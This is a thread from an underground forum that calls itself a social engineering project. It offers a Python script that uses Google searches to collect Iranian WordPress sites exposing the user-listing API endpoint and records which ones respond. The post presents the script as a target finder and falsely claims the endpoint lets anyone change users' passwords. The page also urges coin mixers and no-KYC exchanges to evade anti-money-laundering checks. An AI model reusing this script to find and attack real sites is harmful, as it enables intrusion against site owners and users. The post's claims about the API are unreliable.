Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !

Important Notice:

✅UPGRADE YOUR ACCOUNT TODAY TO ACCESS ALL OFF-SHORE FORUMS✅

[New]Telegram Channel

In case our domain name changes, we advise you to subscribe to our new TG channel to always be aware of all events and updates -
https://t.me/rtmsechannel

OFF-SHORE Staff Announcement: 30% Bonus on ALL Wallet Deposit this week


For example, if you deposit $1000, your RTM Advertising Balance will be $1300 that can be used to purchase eligible products and service on forums or request withdrawal. The limit deposit to get the 30% bonus is $10,000 for a $3000 Marketplace wallet balance Bonus.

Deposit Now and claim 30% more balance ! - BTC/LTC/XMR


Always use a Mixer to keep Maximum anonimity ! - BTC to BTC or BTC to XMR

EXPLOIT FINDER WordPress User Enumeration

⚠️Always Remember to keep your identity safe by using a Zero-KYC Zero-AML like https://coinshift.money⚠️

Gold

ROOT

SENSE!
Verified Seller
Instructor
USDT(TRC-20)
$0.0
With this code, you can search Google and isolate the sites that have this security issue and test which ones have the WP JSON/WP/V2/Users API endpoint, which allows you to retrieve user data such as user ID, username, email address, and other user profile information. You can also use the API to update user data, such as changing a user's password or updating their profile information.





#####################################################

# #

# CODE BY E1.Coders #

# EXPLOIT FINDER WordPress User Enumeration #

# #

#####################################################

import requests

from googlesearch import search

import time



def find_sites(query, num_results):

"""Search Google for the specified query and return a list of URLs."""

urls = []

for url in search(query, num_results=num_results):

urls.append(url)

return urls



def check_url_status(url):

"""Check the HTTP status of a given URL."""

try:

response = requests.get(url)

return response.status_code

except requests.RequestException:

return None



def main():

# Step 1: Search for sites with the specific query

query = 'site:.ir wp-json/wp/v2/users'

num_results = 100 # Adjust the number of results as needed

found_sites = find_sites(query, num_results)



# Step 2: Save found sites to a file (753.txt)

with open('753.txt', 'w') as f:

for site in found_sites:

f.write(f"{site}\n")



# Step 3: Check each site and save those with a 200 status code to another file (963.txt)

with open('963.txt', 'w') as f:

for site in found_sites:

status_code = check_url_status(site)

if status_code == 200:

f.write(f"{site}\n")

time.sleep(1) # To avoid overwhelming the server



if __name__ == "__main__":

main()
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat


Gold

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Top